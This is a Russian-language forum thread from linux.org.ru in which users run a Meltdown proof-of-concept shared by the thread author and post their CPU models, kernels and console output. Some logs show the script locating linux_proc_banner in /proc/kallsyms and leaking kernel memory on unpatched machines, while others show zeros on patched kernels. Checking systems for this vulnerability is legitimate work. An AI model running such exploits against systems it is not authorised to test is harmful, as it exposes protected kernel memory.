LINUX.ORG.RU 

4.14.11-1-ARCH
Intel(R) Core(TM) i5-6600K CPU @ 3.50GHz

++ awk '/linux_proc_banner/ { print $1 }' /proc/kallsyms
+ linux_proc_banner=ffffffff91c00060
+ test ffffffff91c00060 = 0000000000000000
+ ./meltdown ffffffff91c00060 16
cached = 29, uncached = 322, threshold 96
ffffffff91c00060 =  0
ffffffff91c00061 =  0
ffffffff91c00062 =  0
ffffffff91c00063 =  0
ffffffff91c00064 =  0
ffffffff91c00065 =  0
ffffffff91c00066 =  0
ffffffff91c00067 =  0
ffffffff91c00068 =  0
ffffffff91c00069 =  0
ffffffff91c0006a =  0
ffffffff91c0006b =  0
ffffffff91c0006c =  0
ffffffff91c0006d =  0
ffffffff91c0006e =  0
ffffffff91c0006f =  0
ffffffff91c00070 =  0
ffffffff91c00071 =  0
ffffffff91c00072 =  0
ffffffff91c00073 =  0
ffffffff91c00074 =  0
ffffffff91c00075 =  0
Niroday
()

Ну да, на пропатченном ядре нолики, с nopti кусок из /proc/version.

vvn_black ★★★★★
() 
$ make
cc -march=native -mtune=native -O0   -c -o meltdown.o meltdown.c
meltdown.c: Assembler messages:
meltdown.c:45: Error: operand type mismatch for `ror'
make: *** [<встроенное>: meltdown.o] Ошибка 1

Так и должно быть?

dnb ★★★★
()
Ответ на: комментарий от davinchi

Эм... Ничего не нашел с таким названием из файлов.

Niroday
()

На атоме действительно не работает. В выводе нули.

Intel(R) Celeron(R) CPU  N3150  @ 1.60GHz
Radjah ★★★★★
() 
4.9.0-4-amd64
Intel(R) Core(TM) i7-3687U CPU @ 2.10GHz

➜  meltdown-exploit git:(master) ✗ ./run.sh         
+ awk /linux_proc_banner/ { print $1 } /proc/kallsyms
+ linux_proc_banner=ffffffff8c200060
+ test ffffffff8c200060 = 0000000000000000
+ ./meltdown ffffffff8c200060 16
cached = 50, uncached = 185, threshold 96
ffffffff8c200060 = % 25
ffffffff8c200061 = s 73
ffffffff8c200062 =   20
ffffffff8c200063 = v 76
ffffffff8c200064 = e 65
ffffffff8c200065 = r 72
ffffffff8c200066 = s 73
ffffffff8c200067 = i 69
ffffffff8c200068 = o 6f
ffffffff8c200069 = n 6e
ffffffff8c20006a =   20
ffffffff8c20006b = % 25
ffffffff8c20006c = s 73
ffffffff8c20006d =   20
ffffffff8c20006e = ( 28
ffffffff8c20006f = d 64
ffffffff8c200070 = e 65
ffffffff8c200071 = b 62
ffffffff8c200072 = i 69
ffffffff8c200073 = a 61
ffffffff8c200074 = n 6e
ffffffff8c200075 = - 2d

Позже еще на паре машин могу запустить.

aquadon ★★★★★
()
Ответ на: комментарий от dnb

Какое ядро/процессор?

Надо наверное в run.sh добавить эту инфу.

davinchi
() автор топика 
4.4.0-105-generic (ubuntu 16.04.3)
Intel(R) Core(TM)2 Quad CPU    Q6600  @ 2.40GHz
$ ./run.sh
+ awk /linux_proc_banner/ { print $1 } /proc/kallsyms
+ linux_proc_banner=0000000000000000
+ test 0000000000000000 = 0000000000000000
+ sudo awk /linux_proc_banner/ { print $1 } /proc/kallsyms
+ linux_proc_banner=ffffffff81a00060
+ ./meltdown ffffffff81a00060 16
cached = 71, uncached = 364, threshold 160
ffffffff81a00060 =  0
ffffffff81a00061 =  0
ffffffff81a00062 =  0
    (и далее все нули)

HAVE_RDTSCP закомментил (не поддерживается)

anonymous
()

Абанту 17.10, ядро ещё не фикшеное, Intel i5-520M — работает.

Я вижу ты таки решил использовать sigaction и твой код работает. Я сначала тоже хотел оперировать сигналами, но потом попробовал переписать эксплоит, в котором использовались AES-инструкции. Только вместо AES-инструкций вставил busy-wait цикл. У меня не заработало.

utf8nowhere ★★★
()
Последнее исправление: utf8nowhere (всего исправлений: 1)

Если /proc/version недоступен для чтения пользователю, то не работает. Так и должно быть?

anonymous
()

на Celeron'е тоже нолики. и на i7 на пропатченном ядре нолики.

впрочем, я другое значение проверяла, у меня нет linux_proc_banner.

Iron_Bug ★★★★★
()
Ответ на: комментарий от atsym

Скорее всего делаю не так я — это эксплоит на коленке, за пару дней. У ребят было время подготовится и их эксплоит скорее всего читает ВСЁ.

davinchi
() автор топика
Ответ на: комментарий от utf8nowhere

Ага. Там и signal не нужен — он обманывает branch prediction ещё дальше. Хотя это похоже на смесь meltdown & spectre.

davinchi
() автор топика
Ответ на: комментарий от davinchi

я в курсе про опции ядра. только пока мне этот патч не мешает. во всяком случае, на ноуте тормозов не заметно. i-7, 16 гигов рамы. в общем-то, обычные мои задачи ничем не затруднены. нагрузка на проц в среднем не возросла, кмк.

удивилась, что целерон неподвержен. видимо, он настолько древний.

Iron_Bug ★★★★★
()

4.14.11-300.fc27.x86_64 - нули, NOT VULNERABLE.

sT331h0rs3 ★★★★★
()
Ответ на: комментарий от Radjah

ну, интел пишет, что некоторые серии целерона-таки подвержены. мой не из этих серий. но на ноуте он работал честно и вполне достойно.

Iron_Bug ★★★★★
()

Pentium(R) Dual-Core CPU T4400 @ 2.20GHz 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt25-2 (2016-04-08) unknown

Не читает.

Intel(R) Core(TM) i5-4670K CPU @ 3.40GHz 4.9.0-3-amd64 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) unknown

Читает.

Slavik763
() 
Сб янв 13_06:48 $make       
cc -O2 -msse2   -c -o meltdown.o meltdown.c
cc   meltdown.o   -o meltdown
Сб янв 13_06:48 $./run.sh 
looking for linux_proc_banner in /proc/kallsyms
protected. requires root
++ find_linux_proc_banner /proc/kallsyms sudo
++ sudo sed -n -re 's/^([0-9a-f]*[1-9a-f][0-9a-f]*) .* linux_proc_banner$/\1/p' /proc/kallsyms
Пароль: 
+ linux_proc_banner=
+ set +x
not found. reading /boot/System.map-4.4.39-gentoo
+++ uname -r
++ find_linux_proc_banner /boot/System.map-4.4.39-gentoo sudo
++ sudo sed -n -re 's/^([0-9a-f]*[1-9a-f][0-9a-f]*) .* linux_proc_banner$/\1/p' /boot/System.map-4.4.39-gentoo
sed: невозможно прочитать /boot/System.map-4.4.39-gentoo: Нет такого файла или каталога
+ linux_proc_banner=
+ set +x
not found. reading /boot/System.map
++ find_linux_proc_banner /boot/System.map sudo
++ sudo sed -n -re 's/^([0-9a-f]*[1-9a-f][0-9a-f]*) .* linux_proc_banner$/\1/p' /boot/System.map
sed: невозможно прочитать /boot/System.map: Нет такого файла или каталога
+ linux_proc_banner=
+ set +x
can't find linux_proc_banner, unable to test at all

Не работает твой мега-эксплоит у меня.

И да 

Сб янв 13_06:49 $uname -ra
Linux gentoo 4.4.39-gentoo #9 SMP Sat Dec 9 04:52:30 +06 2017 x86_64 Intel(R) Core(TM) i7-3770 CPU @ 3.40GHz GenuineIntel GNU/Linux

Deleted
()
Последнее исправление: Deleted (всего исправлений: 1)
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.
General